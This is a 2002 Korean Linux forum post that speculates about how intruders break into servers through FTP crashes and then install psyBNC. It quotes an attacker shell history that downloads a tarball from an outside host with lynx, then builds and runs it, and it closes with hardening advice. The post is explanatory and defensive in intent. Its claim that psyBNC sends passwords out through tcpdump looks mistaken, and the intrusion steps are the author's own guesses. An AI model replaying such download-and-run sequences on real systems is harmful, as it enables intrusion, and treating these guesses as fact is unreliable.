>> Delete No. 57941 article
No. psybnc해킹툴과 해킹방법을 알자.

등록 2002-09-30 15:14:00 By localhost     조회 4
이름 홍의찬    

		안녕하세요?
 psyBNC란 해킹툴에 대해 알아도, 알고도, 설명하지 못하거나 답변하지 못하는
분들은,.. 뭐하시는 분들일까요?
오늘 psybnc답변좀 검색해 볼라구 했더니 없네요....
 누가 그러더라구요... 왜 비싼 썬장비를 쓰냐면, 리눅스는 보안이 엉망이지않냐~!
 리눅스 포럼사이트 들이 왜 해킹툴에 대한 언급은 하나도 않할까요?
정말 필요한건데,.. 적을 알고 싸워야 이기죠!~
 암튼,..
 해커의 침임방법은 다양합니다.
그중 계정없이 접속하는 방법을 잘은 모르지만, 추정해 보려고 합니다.
 1. 열려있는 ftp를 탐색한다.
2. ftp서버를 통해 세그멘테이션 fault를 유발시켜 자신이 원하는 core파일을 생성시킨다.
3. 생성된 core를 통해 원격으로 계정을 생성한다.(보통 CGI 인터페이스를 사용함)
4. 생성된 계정으로 접속을 시도한다.
5. 본격적인 루트 계정을 얻기위해 psyBNC같은 툴을 다운로드 받는다. 아래는 example이다.
--------------------
ls
wget
help
lynx
lynx http://www.psychoid.lam3rz.de/psyBNC2.3.tar.gz ls
lynx http://www.psychoid.lam3rz.de/psyBNC2.3.tar.gz ls
clear
ls
tar -zxvf psyBNC2.3.tar.gz
ls
cd psybnc
make
ls
./psybnc
--------------------------------------------
6. 위에서 보면, shell 커멘더라인에서 lynx란 text http 클라이언트를 통해 해킹툴을 다운로드 
받는것입니다. 7. 그리고 툴을 컴파일하고, 실행하면, 툴이 동작합니다.
8. 물론, 툴이 하는일은 단순합니다. 시스템운영자가 사용하는 패스워드 계정 IP등 모든 정
보를 tcpdump를 통해 자신이 지정한 서버로 송신하는 것이겠죠.. 9. 헐.. 그럼. 해킹완료..
 써글...넘들..
 --- 보안/대처 방법 ---
1. 방화벽을 설치하고, 불필요한 데몬은 모두 죽인다.
2. 특히 ftp는 필요하지 않으면 죽이고, 필요하면 철저하게 패치된 ftp서버를 사용한다.
3. 서버를 정기적으로 점검한다. 모르는 계정이 있거나 passwd, shadow, group등의 파일에
모르는 라인이 있으면 바로 삭제한다.
4. 특히 ps, netstat, ls 등 중요한 유틸리티는 백업해 두었다가 정체불명의 프로세서나 포트등
의 탐색에 지장이 없도록 한다. 왜냐면, 해커들은 자신의 툴을 감추기 위해 ps, netstat, ls등
의 파일도 변경하는 경우가 있다.
 이상입니다.
[관리자] 패스워드를 입력 하십시오. 답장이 존재하면 함께 삭제됩니다.[ 목록 | 이전 ]
패스워드:    

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved